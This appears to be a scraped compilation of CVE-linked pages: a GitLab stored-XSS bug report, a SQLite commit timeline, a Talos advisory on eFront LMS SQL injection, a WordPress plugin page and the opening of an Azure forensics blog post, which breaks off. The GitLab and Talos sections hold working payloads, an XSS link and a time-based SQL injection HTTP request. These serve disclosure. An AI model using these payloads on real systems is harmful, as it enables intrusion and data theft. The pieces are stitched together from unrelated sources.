SciLexer.dll in Scintilla in Notepad++ (x64) before 7.7 allows remote code execution or denial of service via Unicode characters in a crafted .ml file.

CVE-2019-16294: Scintilla

An input validation and output encoding issue was discovered in the GitLab CE/EE wiki pages feature which could result in a persistent XSS. This vulnerability was addressed in 12.1.2, 12.0.4, and 11.11.6.

Skip to content

Open Issue created Apr 06, 2019 by **GitLab SecurityBot@gitlab-securitybot**Reporter

**Stored XSS in Wiki pages**

**HackerOne report #526325** by ryhmnlfj on 2019-04-04, assigned to hackerjuan:

**Summary**

I found Stored XSS using Wiki-specific Hierarchical link Markdown in Wiki pages.

**Steps to reproduce**

1.  Sign in to GitLab.
2.  Open a Project page that you have permission to edit Wiki pages.
3.  Open Wiki page.
4.  Click "New page" button.
5.  Fill out "Page slug" form with javascript:.
6.  Click "Create page" button.
7.  Fill out the each form as follows:  
    Title: javascript:  
    Format: Markdown  
    Content: [XSS](.alert(1);)  
    (Please see "CreatePage.png")  
    
8.  Click "Create page" button.
9.  Click "XSS" link in created page.

**What is the current _bug_ behavior?**

The alert dialog appears after clicking "XSS" link in created page.  
Please see "Result\_Firefox.png".  

**Description In Detail:**

GitLab application converts the Markdown string .alert(1); to the href attribute javascript:alert(1);.  
Furthermore, Wiki-specific Markdown string . is converted to javascript: in this case.

**What is the expected _correct_ behavior?**

The dangerous href attribute javascript:alert(1); should be filtered.  
A safe HTTP/HTTPS link should be rendered instead.

**Additional Informations:**

1.  In the above case, another Wiki-specific Markdown string .. is also converted to javascript:.
    
2.  Using Title string such as javascript:STRING_EXPECTED_REMOVING also reproduces this vulnerability.  
    For example, if a wiki page is created with a disguised Title string JavaScript::SubClassName.function_name, GitLab application converts Wiki-specific Markdown string . to JavaScript: in such page.  
    It seems that GitLab application recognizes scheme-like string JavaScript: and removes the rest of Title string :SubClassName.function_name.
    
3.  An attacker can use various schemes by replacing Title string javascript: to other scheme. (e.g. data:, vbscript:, and so on.)
    

**Output of checks**

This bug happens on the official Docker installation of GitLab Enterprise Edition 11.9.4-ee.

**Results of GitLab environment info**

Output of sudo gitlab-rake gitlab:env:info:

    System information  
    System:		  
    Proxy:		no  
    Current User:	git  
    Using RVM:	no  
    Ruby Version:	2.5.3p105  
    Gem Version:	2.7.6  
    Bundler Version:1.16.6  
    Rake Version:	12.3.2  
    Redis Version:	3.2.12  
    Git Version:	2.18.1  
    Sidekiq Version:5.2.5  
    Go Version:	unknown
    
    GitLab information  
    Version:	11.9.4-ee  
    Revision:	55be7f0  
    Directory:	/opt/gitlab/embedded/service/gitlab-rails  
    DB Adapter:	postgresql  
    DB Version:	9.6.11  
    URL:		http://gitlab.example.com  
    HTTP Clone URL:	http://gitlab.example.com/some-group/some-project.git  
    SSH Clone URL:	git@gitlab.example.com:some-group/some-project.git  
    Elasticsearch:	no  
    Geo:		no  
    Using LDAP:	no  
    Using Omniauth:	yes  
    Omniauth Providers: 
    
    GitLab Shell  
    Version:	8.7.1  
    Repository storage paths:  
    - default: 	/var/opt/gitlab/git-data/repositories  
    GitLab Shell path:		/opt/gitlab/embedded/service/gitlab-shell  
    Git:		/opt/gitlab/embedded/bin/git  

**Impact**

If wiki pages created by using this vulnerability are visible to everyone (Wiki Visibility setting is set to "Everyone With Access") in "Public" project, there is a possibility that a considerable number of GitLab users and visitors click a malicious link.

**Attachments**

**Warning:** Attachments received through HackerOne, please exercise caution!

*   CreatePage.png
*   Result\_Firefox.png

CVE-2019-5467: Stored XSS in Wiki pages (#60143) · Issues · GitLab.org / GitLab FOSS · GitLab

In SQLite through 3.29.0, whereLoopAddBtreeIndex in sqlite3.c can crash a browser or other application because of missing validation of a sqlite_stat1 sz field, aka a "severe division by zero in the query planner."

**100 check-ins**

2023-03-23

12:00

Fix #ifdefs that use the wrong preprocessor macro. (Leaf check-in: 0aecf360 user: drh tags: nan-inf)

10:58

The attempt to bring STAT4 up to 100% MC/DC at \[55a26c67ed4a3a93\] and at \[168fa2fb22b8c1ad\] are incorrect. Back them out and replace them with a simple NEVER() macro. Error reported by forum post dc4854437b. (Leaf check-in: 76e683c5 user: drh tags: branch-3.41)

10:54

The attempt to bring STAT4 up to 100% MC/DC at \[55a26c67ed4a3a93\] and at \[168fa2fb22b8c1ad\] are incorrect. Back them out and replace them with a simple NEVER() macro. Error reported by forum post dc4854437b. (Leaf check-in: 5992370a user: drh tags: trunk)

2023-03-22

20:21

Add the SQLITE\_ENABLE\_NAN\_INF compile-time option which makes the following behavior changes: (1) sqlite3\_value\_double(NULL) returns NaN, (2) SQLite preserves NaN values rather than converting them to NULL. (3) CAST statements understand "NaN" and "Inf" and make the right conversions. (4) Non-standard JSON is never generated by SQLite JSON routines, but those routines will accept floating point literals "NaN", "Inf", and "-Inf". (check-in: 96ec8306 user: drh tags: nan-inf)

19:57

Internal cleanups in JS code. No functional changes. (check-in: 8fbdf7d1 user: stephan tags: trunk)

16:55

The floating-point-to-text conversion with the zero-padding option now renders NaN as "null". (check-in: ad59fa17 user: drh tags: trunk)

16:37

For consistency, the ".mode json" output from the CLI now renders infinity in the same format as the JSON functions. (check-in: abee339d user: drh tags: trunk)

16:24

The double-to-text conversion renders infinity as 9e999, so that JSON output is compliant and so that values can be round-tripped. (check-in: b52081d0 user: drh tags: trunk)

16:01

In the CLI, the magic parameter :inf and :nan bind floating point values Infinity and NaN, respectively, as an add to testing SQLite's handling of those quantities. (check-in: c70a61d8 user: drh tags: trunk)

14:51

Update the version number for the TEA tarball to 3.42.0, to match the core. (check-in: 03e6918e user: drh tags: trunk)

13:47

Merge the 3.41.2 patch into the reuse-schema-3.41 subbranch of reuse-schema (Leaf check-in: 995fa4d0 user: drh tags: reuse-schema-3.41)

13:35

Merge the 3.41.2 patches into the bedrock-3.41 subbranch of bedrock. (Leaf check-in: b7a144c4 user: drh tags: bedrock-3.41)

13:25

Merge the 3.41.2 patch into the wal2-3.41 subbranch of wal2. (Leaf check-in: db44f17a user: drh tags: wal2-3.41)

11:56

Version 3.41.2 (check-in: 0d1fc92f user: drh tags: release, branch-3.41, version-3.41.2)

11:12

Increment the version number in the TEA configure script to 3.41.2. (check-in: 2bb74aa5 user: drh tags: branch-3.41)

2023-03-21

14:20

Add ALWAYS() on a branch this is always true now due to \[84417bbd144b2197\]. (check-in: badf7d0e user: drh tags: trunk)

12:29

Add the fuzzcheck-asan.exe target to the MSVC makefile. (check-in: 0901bc02 user: drh tags: trunk)

11:56

Add the fuzzcheck-asan target to the main posix makefile. (check-in: 55e94add user: drh tags: trunk)

11:27

Fix a valgrind error and potential buffer overread when handling a corrupt database. (check-in: cb8b34fa user: drh tags: branch-3.41)

11:13

Fix a valgrind error and potential buffer overread when handling a corrupt database. (check-in: b1e0cd64 user: dan tags: trunk)

2023-03-20

20:22

Reinsert two NEVER() macros for b-tree branches that were previously needed for \[b6a82f3c3b9d89fd\] but which are now obsolete due to \[73f0036f045bf371\]. **Later:** dbsqlfuzz quickly found new cases for which those two branches are needed. The new test cases have been added to TH3. (Closed-Leaf check-in: 3065dadb user: drh tags: backout)

18:35

Minor change to btreeNext() to facilitate coverage testing. (check-in: 20b3ef04 user: drh tags: trunk)

15:50

Fix a problem causing a cursor to retain an out-of-date cell-info cache when processing a DISTINCT query on values that are identical according to their collation sequence, but different on disk. (check-in: b0281184 user: drh tags: branch-3.41)

14:59

Fix a problem causing a cursor to retain an out-of-date cell-info cache when processing a DISTINCT query on values that are identical according to their collation sequence, but different on disk. Forum post e123e6cde4. (check-in: 1b3abc1d user: dan tags: trunk)

10:43

Back out the extra margin added to the input buffer of the CLI, as it is not needed. (check-in: ac8d1e5d user: drh tags: trunk)

01:59

Fix problems with the sqlite3\_error\_offset() function and its use in the CLI. (check-in: d5cd6c88 user: drh tags: branch-3.41)

01:55

A better fix for the sqlite3\_error\_offset() problem on generated columns. (check-in: 770b3e67 user: drh tags: trunk)

00:53

Expression errors in generated columns should not generate non-negative sqlite3\_error\_offset() returns. Second of two defenses against \[33aa4c0de8a62e33\]. (check-in: 2adb4e0d user: drh tags: trunk)

00:48

When reporting errors in the CLI, ignore the output of sqlite3\_error\_offset() if the value returned is clearly out-of-range. One of two lines of defense against \[33aa4c0de8a62e33\]. (check-in: 26adbb80 user: drh tags: trunk)

2023-03-19

21:53

Increase the size of ref-count values in the pager layer to 64-bits, to avoid any reasonable possiblity of overflowing the counters. (check-in: 824611ad user: drh tags: branch-3.41)

21:48

Increase the size of ref-count values in the pager layer to 64-bits, to avoid any reasonable possiblity of overflowing the counters. There is a performance and memory penality for this. Forum post b741f15a35. (check-in: 6c5d99a8 user: drh tags: trunk)

10:30

Avoid a buffer overread in fts3 that could occur when processing a corrupt record. (check-in: 1f91fe4b user: drh tags: branch-3.41)

2023-03-18

16:12

Avoid a buffer overread in fts3 that could occur when processing a corrupt record. (check-in: 02ac2297 user: dan tags: trunk)

2023-03-17

20:31

Fix json rendering so that it shows positive and negative infinity as 9.0e+999 and -9.0e+999 respectively. (Closed-Leaf check-in: efce4690 user: drh tags: numeric-only-json)

19:18

Add the ability to name functions using one of the join keywords like CROSS FULL INNER LEFT NATURAL OUTER RIGHT. (check-in: 0910b192 user: drh tags: trunk)

19:07

Add test cases for functions named the same as join keywords. (Closed-Leaf check-in: 94944b23 user: drh tags: functions-named-left)

14:22

Fix a potential buffer overread in the recovery extension. (check-in: 78836713 user: dan tags: branch-3.41)

14:18

Fix a potential buffer overread in the recovery extension. (check-in: 0b3b5bf9 user: dan tags: trunk)

12:25

Ensure that an error does not delete the Table object out from under the xConstruct method of a virtual table. dbsqlfuzz 7cc8804a1c6d4e3d554d79096e6ea75a7c1c7d2d (check-in: c5bd0ea3 user: drh tags: branch-3.41)

10:43

Ensure that an error does not delete the Table object out from under the xConstruct method of a virtual table. dbsqlfuzz 7cc8804a1c6d4e3d554d79096e6ea75a7c1c7d2d (check-in: df4928c9 user: drh tags: trunk)

10:30

Increase the version number to 3.41.2 (check-in: 122f12f5 user: drh tags: branch-3.41)

00:42

Add safety margin on the CLI input buffer for tickets \[33aa4c0de8a62e33\], \[b97e6c5e6a91d97f\], \[2971fbe3f993e95a\], and \[2971fbe3f993e95a\]. (check-in: 741af08a user: drh tags: trunk)

00:10

Fix assert() statements that would (incorrectly) fire if an IF NOT EXISTS trigger that already exists contained two or more RETURNING clauses. (check-in: 9b43b34d user: drh tags: branch-3.41)

00:01

Fix assert() statements that would (incorrectly) fire if an IF NOT EXISTS trigger that already exists contained two or more RETURNING clauses. Tickets \[89d259d45b855a0d\] and \[d15b3a4ea901ef0d\]. (check-in: 648899e4 user: drh tags: trunk)

2023-03-16

21:05

Correctly handle SELECT DISTINCT ... ORDER BY when all of the result set terms are constant and there are more result set terms than ORDER BY terms. (check-in: 097512b6 user: drh tags: branch-3.41)

20:54

Correctly handle SELECT DISTINCT ... ORDER BY when all of the result set terms are constant and there are more result set terms than ORDER BY terms. Fix for these tickets: \[c36cdb4afd504dc1\], \[4051a7f931d9ba24\], \[d6fd512f50513ab7\]. (check-in: 12ad822d user: drh tags: trunk)

12:28

Additional debug/test output from the query invariant checker showing the row-number that is being checked. (check-in: e4b6eb58 user: drh tags: trunk)

11:50

Update the tracing output for the query-invariant checker such that it shows the SQL that is run to verify that a found query-invariant discrepency is valid. Changes to testing logic only. (check-in: 8f45ad27 user: drh tags: trunk)

10:21

Do not use the one-pass optimization on an UPDATE if there is a subquery in the WHERE clause, since if the subquery is hidden behind a short-circuit operator, the subquery might not be evaluated until after one or more rows have been updated. (check-in: b5d8a9a6 user: drh tags: branch-3.41)

10:17

Do not use the one-pass optimization on an UPDATE if there is a subquery in the WHERE clause, since if the subquery is hidden behind a short-circuit operator, the subquery might not be evaluated until after one or more rows have been updated. Fix for the problem reported by forum post 0007d1fdb1. This is the same problem that was fixed by \[73f0036f045bf371\] only for UPDATE instead of DELETE. (check-in: 2c56b984 user: drh tags: trunk)

09:16

Remove a NEVER() from btreeNext(). (check-in: 40623f5a user: drh tags: branch-3.41)

09:12

Fix a broken assert() in the recovery extension. (check-in: 048711e4 user: drh tags: branch-3.41)

09:07

Remove a NEVER() from btreeNext() that dbsqlfuzz 460aa158f9a2c41145831cc924296cde1f312b3f found could sometimes be reached. I will find a way to test that branch later. (check-in: 1dffeffe user: drh tags: trunk)

02:30

Another approach at attempting to contain the damage caused by corruption that leaves MemPage.isInit clear. Works better than the previous but is still not perfect. (Closed-Leaf check-in: ba964eb0 user: drh tags: corruption-in-btree-init)

01:20

When the btreeInitPage() routine detects database corruption, it should continue to the end and set MemPage.isInit before it returns SQLITE\_CORRUPT, because if it leaves MemPage.isInit unset, then can cause difficulty later. dbsqlfuzz 460aa158f9a2c41145831cc924296cde1f312b3f (check-in: 44e83f8b user: drh tags: corruption-in-btree-init)

2023-03-15

18:05

Disallow the one-pass optimization for DELETE if the WHERE clause contains a subquery. (check-in: 25e18318 user: drh tags: branch-3.41)

17:58

Disallow the one-pass optimization for DELETE if the WHERE clause contains a subquery. Fix for the problem reported by forum post e61252062c9d286d. This fix is more restrictive than necessary. It could be relaxed if the subquery does not involve the table that is the subject of the DELETE. (check-in: 73f0036f user: drh tags: trunk)

13:53

Fix a broken assert() in the recovery extension. (check-in: 4c4e66f2 user: dan tags: trunk)

2023-03-14

20:16

Fix Bloom filters on an expression index. (check-in: 11e0256b user: drh tags: branch-3.41)

20:08

Fix Bloom filters on an expression index. forum post 2e427099d5 and forum post d47a0e8e3a. This problem goes back to the original introduction of Bloom filters (check-in \[633bfeeea2bccdd4\]) for SQLite version 3.38.0. (check-in: c028fb66 user: drh tags: trunk)

2023-03-13

16:08

Include CLI's tip for -- in all builds. Better show optionality of its non-option arguments. (check-in: 9e2c771d user: larrybr tags: trunk)

2023-03-11

23:29

The cherry-pick merge at \[371838562a675c1b\] caused a performance regression for some queries, which is here fixed. (check-in: 6d6d95fc user: drh tags: branch-3.41)

23:21

The check-in at \[198b3e33dcfd74c7\] caused a performance regression for some queries, which is here fixed. Problem reported by forum post b405033490fa56d9. (check-in: dc9f025d user: drh tags: trunk)

12:27

Allow functions named using keywords "CROSS", "FULL", "INNER", "LEFT", "NATURAL", "OUTER", and "RIGHT". (check-in: eeac3d5e user: drh tags: functions-named-left)

00:15

CLI help to reflect no-more-options option (check-in: 30d95a12 user: larrybr tags: trunk)

2023-03-10

21:27

Fix a typo in a comment. No code changes. (check-in: 76acc075 user: drh tags: trunk)

20:54

Give CLI a no-more-options option. (--) (check-in: 08227887 user: larrybr tags: trunk)

13:36

Fix a problem with the fts5 snippet() function that shows up when snippets just 1 token in length are requested. (check-in: 96d5116d user: dan tags: trunk)

12:47

Merge the 3.41.1 patches into the bedrock branch. (check-in: 2780cc9f user: drh tags: bedrock-3.41)

12:13

Version 3.41.1 (check-in: 20399f3e user: drh tags: release, branch-3.41, version-3.41.1)

11:57

Export SQLITE\_FCNTL\_RESET\_CACHE to JS. (check-in: 6195cfc8 user: stephan tags: trunk)

00:59

Merge the branch-3.41 patches into the reuse-schema branch. (check-in: af08bd3e user: drh tags: reuse-schema-3.41)

00:21

Merge the latest 3.41 patches into a new branch called wal2-3.41. (check-in: e67bfc76 user: drh tags: wal2-3.41)

2023-03-09

22:09

Replace a lingering use of 'self' with 'globalThis' in JS code, for node compatibility. (check-in: 7e3782b5 user: stephan tags: trunk)

16:11

Reinstate some test cases accidentally removed by \[cb023fe28560ce0f\]. (check-in: 870de61f user: dan tags: trunk)

16:04

In the Bloom filter optimization, hash all strings and blobs into the same value, because we do not know if two different strings might compare equal even if they have different byte sequences, due to collating functions. Formerly, the hash of a string or blob was just its length. This could all be improved. (check-in: cc8a0ee4 user: drh tags: branch-3.41)

15:08

Fix countofview.test so that it works with SQLITE\_OMIT\_PROGRESS\_CALLBACK builds. (check-in: d55a7742 user: dan tags: branch-3.41)

15:08

Fix countofview.test so that it works with SQLITE\_OMIT\_PROGRESS\_CALLBACK builds. (check-in: 2fc7c3fc user: dan tags: trunk)

14:14

Update the version number to 3.41.1 (check-in: e4e2e647 user: drh tags: branch-3.41)

13:58

Merge count-of-view optimization fixes from trunk. But count-of-view is still off by default for this branch. (check-in: cbbe8986 user: drh tags: branch-3.41)

08:51

Experimental addition of sqlite3-node.mjs, for node.js, based on feedback from forum post ac7a94d4f77db235 and related off-list discussions. Build changes only - no code changes. (check-in: a5db97fa user: stephan tags: trunk)

01:35

Fix a possible NULL pointer dereference due to the sqlite3\_interrupt() enhancement in the 3.41.0 release. (check-in: 66d24a22 user: drh tags: branch-3.41)

2023-03-08

23:05

Fix a possible NULL pointer dereference due to the sqlite3\_interrupt() enhancement at \[bd8fa10e59f58886\]. Reported by forum post f5a2b1db87. (check-in: 84417bbd user: drh tags: trunk)

22:48

Backout the OP\_MakeRecord optimization as it does not work. (check-in: 25017312 user: drh tags: trunk)

18:05

Export the new SQLITE\_CHANGESETAPPLY\_IGNORENOOP flag to JS. (check-in: ac7359b2 user: stephan tags: trunk)

18:03

Add the SQLITE\_CHANGESETAPPLY\_IGNORENOOP flag, which may be passed to sqlite3changeset\_apply\_v2() to have it ignore changes that would be no-ops if applied to the database (e.g. deleting a row that has already been deleted), instead of considering them conflicts. (check-in: cb023fe2 user: dan tags: trunk)

17:09

Small performance improvement in the OP\_MakeRecord opcode. (check-in: ca89daef user: drh tags: trunk)

14:37

Keep the historical datatype ("INT", not "NUM") for a table created as follows: "CREATE TABLE t1 AS SELECT CAST(123 AS INT) AS value;". The use of FLEXNUM only occurs on compound queries. (check-in: dc1033af user: drh tags: branch-3.41)

14:28

Change to \[44135d6ea84f7ba6\] that retains the historical datatype ("INT", not "NUM") for a table created as follows: "CREATE TABLE t1 AS SELECT CAST(123 AS INT) AS value;". The use of FLEXNUM only occurs on compound queries. (check-in: 6d5b5896 user: drh tags: trunk)

10:05

Extend wasm build to support a custom sqlite3.c to support building against sqlite3-see.c. The JS code now binds the SEE-specific functions if it detects an SEE build. (check-in: dd8612c8 user: stephan tags: trunk)

00:47

Fix a problem in the count-of-view optimization that can lead to incorrect bytecode. dbsqlfuzz 23d782160b71c3f8f535ccb2da313dfc8eb8c631. (check-in: f4500953 user: drh tags: trunk)

00:04

Fix an assertion fault added by \[65ffee234787213c\]. (check-in: d00e68ba user: drh tags: branch-3.41)

2023-03-07

23:47

Fix a bug introduced 4 days ago by \[e95439119ac200cb\]: do not set the Expr.affExpr field of a generated column expression if the expression is a RAISE() function, as affExpr has a different meaning for RAISE. Forum post b312e075b5. (check-in: 1096b5a7 user: drh tags: trunk)

19:39

A proposed change to \[44135d6ea84f7ba6\] that retains the historical datatype ("INT", not "NUM") for a table created as follows: "CREATE TABLE t1 AS SELECT CAST(123 AS INT) AS value;". (Closed-Leaf check-in: a0e54fe2 user: drh tags: flexnum-proposed-fix)

19:23

Improve how sqlite3.initWorker1API() determines whether it's running in a Worker thread. Based on feedback in forum post ac7a94d4f77db235. (check-in: 2f712b83 user: stephan tags: trunk)

19:12

Replace use of 'self' in JS code with 'globalThis', as that works in browsers and node environments. Avoid using globalThis.location if it's not set (e.g. in node). Based on feedback in forum post ac7a94d4f77db235. Minor JS build tweaks. (check-in: dbbe8f25 user: stephan tags: trunk)

12:59

In the JS sqlite3.vfs/vtab utility APIs, use a local reference to StructBinder instead of sqlite3.StructBinder, as that object is removed from the sqlite3 namespace during the final steps of API initialization. Based on feedback from forum post d19d96183badca70. (check-in: 0d89885d user: stephan tags: trunk)

02:24

Fix a couple minor spacing issues in the MSVC makefile. (check-in: 46b3ac6d user: mistachkin tags: trunk)

2023-03-06

23:39

Repair an unintential fork. (check-in: 8b524c84 user: drh tags: trunk)

23:38

Improvements to query invariant testing such that it uses the new SQLITE\_DBCONFIG\_REVERSE\_SCANORDER opcode to sqlite3\_db\_config() to make more accurate judgements about when a query is ambiguous, and hence when query invariant testing is approprate. (check-in: be9ab292 user: drh tags: trunk)

More ↓

CVE-2019-16168: SQLite: Timeline

SQL injection in the photo-gallery (10Web Photo Gallery) plugin before 1.5.35 for WordPress exists via the admin/controllers/Albumsgalleries.php album_id parameter.

CVE-2019-16119

An exploitable SQL injection vulnerability exists in the unauthenticated portion of eFront LMS, versions v5.2.12 and earlier. Specially crafted web request to login page can cause SQL injections, resulting in data compromise. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.

**Summary**

An exploitable SQL injection vulnerability exists in the unauthenticated portion of eFront LMS, versions v5.2.12 and earlier. Specially crafted web request to login page can cause SQL injections, resulting in data compromise. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.

**Tested Versions**

Epignosis eFront LMS v5.2.12

**Product URLs**

https://www.efrontlearning.com/

**CVSSv3 Score**

6.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

**CWE**

CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)

**Details**

The following parameters are vulnerable to unauthenticated SQL injection attacks:

PHPSessionID parameter:

    GET / HTTP/1.1
    Host: [IP]
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Cookie: PHPSESSIDfb411=aaaaaaaaa%00'[SQL INJECTION]
    Upgrade-Insecure-Requests: 1
    

PoC:

    GET / HTTP/1.1
    Host: [IP]
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Cookie: PHPSESSIDfb411=bbbbbb%00' AND (SELECT 1 FROM (SELECT(SLEEP(8)))a) AND '1'='1
    Upgrade-Insecure-Requests: 1
    

**Timeline**

2019-07-29 - Vendor disclosure  
2019-07-31 - Vendor acknowledged issues under review  
2019-08-13 - Vendor acknowledged work to fix issues & testing  
2019-08-30 - Vendor patched/released new version  
2019-09-03 - Public disclosure

CVE-2019-5070: TALOS-2019-0859 || Cisco Talos Intelligence Group

The custom-404-pro plugin before 3.2.8 for WordPress has reflected XSS, a different vulnerability than CVE-2019-14789.

*   Details
*   Reviews
*   Installation
*   Development

Allows users to replace the default 404 page with a custom page from the Pages section in the Admin Panel. Or you can specify a complete URL to redirect on 404.

**Important Note**

Please open issues on Github. I will not be using the WordPress.org support area.

**Features**

*   Full 404 Page Control
*   Record 404 Page Data
*   Custom Page Redirect
*   Custom URL Redirect

**How does it work?**

*   WordPress Page: Choose a custom page from the Admin Panel
*   URL: Enter a custom URL for 404
*   Stats: List of all 404s

*   Extract the downloaded ZIP file.
*   Copy the custom-404-pro folder to the wp-content/plugins directory.
*   Activate from the Plugins Section.

**Why is the 404 custom redirect not working?**

Some users have reported an issue with the Divi theme where the 404 redirect does not work. In such cases, please disable the Divi theme and try again. It’s usually a good practice to start disabling themes/plugins one by one and work your way backward to see what might be causing the issue.

**Why are my plugin preferences not being saved?**

Uninstall the plugin from the Plugins page (important!) and reinstall it. Never remove plugin folders directly from your WordPress installation as this DOES NOT cleanup plugin database tables.

Thank you so much for this brilliant plugin. I am not technically confident, cannot do much by way of coding and get overwhelmed with geek speak. I downloaded this plugin after trying (and failing with) another, and within 10 minutes had my custom 404 page up and running. This has saved me time, energy and stress. Thank you so much. I have just donated something small too to support you in your work and creativity.

На мой взгляд, это лучшее и простое дополнение для перенаправления! Перенаправляет даже с «закрытой страницы» ?author=1 что другие подобные дополнения делать не могут. Молодец.

ignore this, wrong plugin.

This plugin was working great for us until we adjust the settings to start logging the 404 pages. Then, the custom page we selected in Wordpress for the 404 to route to stops working. Is this a known bug?

Works simple and fine! Congratulations!

Gets the job done in seconds. Super easy to use!

Read all 22 reviews

“Custom 404 Pro” is open source software. The following people have contributed to this plugin.

Contributors

*    Kunal

**3.9.0**

*   Support WordPress 6.3

**3.8.2**

*   Fix logs vuln

**3.8.1**

*   Fix Search vuln

**3.8.0**

*   Support WordPress 6.2

**3.7.4**

*   Fix SQL injection

**3.7.3**

*   Fix vulnerabilities

**3.7.2**

*   Fix CSRF vulnerability in Logs table

**3.7.1**

*   Fix path vulnerability

**3.7.0**

*   Support WordPress 6.1

**3.6.0**

*   Support WordPress 6.0

**3.5.0**

*   Support WordPress 5.9

**3.4.0**

*   Support WordPress 5.8

**3.3.0**

*   Add Multisite Support

**3.2.21**

*   Support WordPress 5.7

**3.2.20**

*   Support WordPress 5.6

**3.2.19**

*   Support WordPress 5.5

**3.2.18**

*   Integrate GitHub actions

**3.2.17**

*   Bump version to support 5.4

**3.2.16**

*   Bump version to support 5.3.2

**3.2.15**

*   Bump version to support 5.3.1

**3.2.14**

*   Update Readme to include FAQ

**3.2.13**

*   Remove upgrader script

**3.2.12**

*   Updates + Remove Migrate & Reset Tabs

**3.2.11**

*   Fix Redirect Bug

**3.2.10**

*   More updates and fixes

**3.2.9**

*   Fix Reflected XSS in other places according to the WordPress Plugin Notice

**3.2.8**

*   Fix Reflected XSS

**3.2.7**

*   Version Bump to support WordPress 5.2

**3.2.6**

*   Follow WordPress Coding Standards

**3.2.5**

*   Update from v2 to v3 for all users

**3.2.4**

*   Error Logging

**3.2.3**

*   \[BUGFIX\] Migrate logs changed to 500

**3.2.2**

*   \[NEW\] Migrate Tab: Migrate Logs from Plugin version < 3.0.0 to the new logging system
*   \[BUGFIX\] Typo in Reset Tab when deleting old logs

**3.2.1**

*   \[NEW\] Bulk Action: Delete All Logs now available

**3.2.0**

*   Exports Logs as CSV
*   Better model for showing Admin Notices
*   Validating URL (required and structure) when URL mode chosen for redirection
*   General cleanup

**3.1.1**

*   Fix Log IP default setting

**3.1.0**

*   Logging IP is now optional

**3.0.5**

*   Fix Upgrader function bug

**3.0.4**

*   Fix Settings not saving Bug

**3.0.3**

*   Fix Uninstall Bug

**3.0.2**

*   Streamlining the upgrade process

**3.0.0**

*   Complete re-write from the ground-up with a new logging mechanism and better base for future development

**2.1.1**

*   Add Referer so users know where the 404 came from

**2.1.0**

*   Cleanup on uninstall
*   Email blog title
*   Fix unnecessary CSS and JS loading

**2.0.3**

*   Disable logging by default

**2.0.2**

*   Fixed Donate Links

**2.0.1**

*   Small bugfix while clearing logs

**2.0.0**

*   Better feedback while Clearing Logs
*   Added 404 Option to Log Type

**1.4.0**

*   Option to Clear Logs
*   Option to Stop Logging

**1.3.12**

*   Fixed github issue #3

**1.3.10**

*   Fixed some bugs

**1.3.9**

*   Redefined Log Filters with User Agent API

**1.3.8**

*   Added User Agent Filter

**1.3.0**

*   Changed entire plugin to a Custom Post Type Layout
*   More structure to the plugin, better code

**1.0.0**

*   Initial Release

CVE-2019-15838: Custom 404 Pro

Traditional computer forensics and cyber investigations are as relevant in the cloud as they are in on-premise environments, but the methods in which to access and perform such investigations differ. This post will describe some of the challenges of bringing on-premises forensics techniques to the cloud and show one solution to overcome these challenges, using Azure functionality.

Traditional computer forensics and cyber investigations are as relevant in the cloud as they are in on-premise environments, but the methods in which to access and perform such investigations differ. This post will describe some of the challenges of bringing on-premises forensics techniques to the cloud and show one solution to overcome these challenges, using Azure functionality. The PowerShell files referred to in this blog are available in the Scalable Infrastructure for Investigation and Incident Response GitHub repo, including a readme.md containing a step-by-step on how to set up the environment:

In this post we make the following assumptions:

*   You are going to create an image of a Windows VM
*   You have full permissions in your subscription
*   You are going to have two resource groups within your subscription: one for templates and one for deployed VMs

Note: This blog is focused on how to help you prepare for cloud forensics. Where applicable, we’re linking to other documents providing background or more detail.

**Why forensics is different in the cloud… and one way to adapt Why forensics is different in the cloud… and one way to adapt**

Investigators face some challenges when looking at transposing their traditional forensic investigative tools and capabilities into a cloud environment.

*   **Working at scale.** Hardware required to perform on-premise and physical investigations cannot be applied easily in a cloud environment (at least without a great deal of time and bandwidth in downloading and uploading vast amounts of data).
*   **Distance.** Having all your investigative assets in a single location is not conducive to a timely response. Even if the investigation capability is hosted in the cloud, there will still be a delay in acquiring evidence from machines hosted on the other side of the globe.
*   **Greater exposure.** Investigative machines may become contaminated or infected during an investigation, especially when there is malware analysis involved. There is also a risk of aggregated data, where an investigation machine may itself become a target due to the amount of information it could contain.
*   **Maintenance.** Finally, there’s maintenance. If there is a fleet of _always on_ machines; these require the operating system to be patched and updated along with all software updates and refreshes.

One solution to address these challenges is to create a VM Image for investigations and deploy as needed. We \_could c\_reate several investigative VMs in multiple regions and leave them running for availability and for update management, but this is going to get expensive and will be harder to manage. A better option is to deploy an image of a prebuilt VM (up-to-date and with pre-deployed tools and apps) to every region you require. Then you can build multiple machines from each image as needed. The solution relies on the use of Azure PowerShell cmdlets, Azure Automation and Runbooks. We’ll discuss the details in the next sections.

**Setting up the investigations image Setting up the investigations image**

Let’s look at how to set up your forensic environment, from creating the Tools VM, creating an automation account, creating runbooks, preparing scripts and storage, protecting credentials, testing, and scheduling.

**Step 1: Build and prepare a VM Step 1: Build and prepare a VM**

The first thing we need to do is create the initial VM image to be the template. To do this we will deploy a resource managed Windows 10 Virtual Machine. Follow the standard creation process and deploy it to your templates resource group. Ensure you have Network Security Group applied, to lock down remote access to only allowed endpoints

Once deployed, we connect to the VM and configure it to the desired state. Next, we run Sysprep to remove all user account and user-based customisation to make it a generalised image. (Note that if you are removing or updating Windows Store Apps, you may get errors when trying to run Sysprep. For more information, see this support article: Sysprep fails after you remove or update Microsoft Store apps that include built-in Windows images.

    C:\Windows\System32\Sysprep\sysprep.exe /generalize /oobe /shutdown /quiet 
    

Note: To prepare a Linux VM to be imaged, follow the documentation here.

**Step 2: Create an automation account Step 2: Create an automation account**

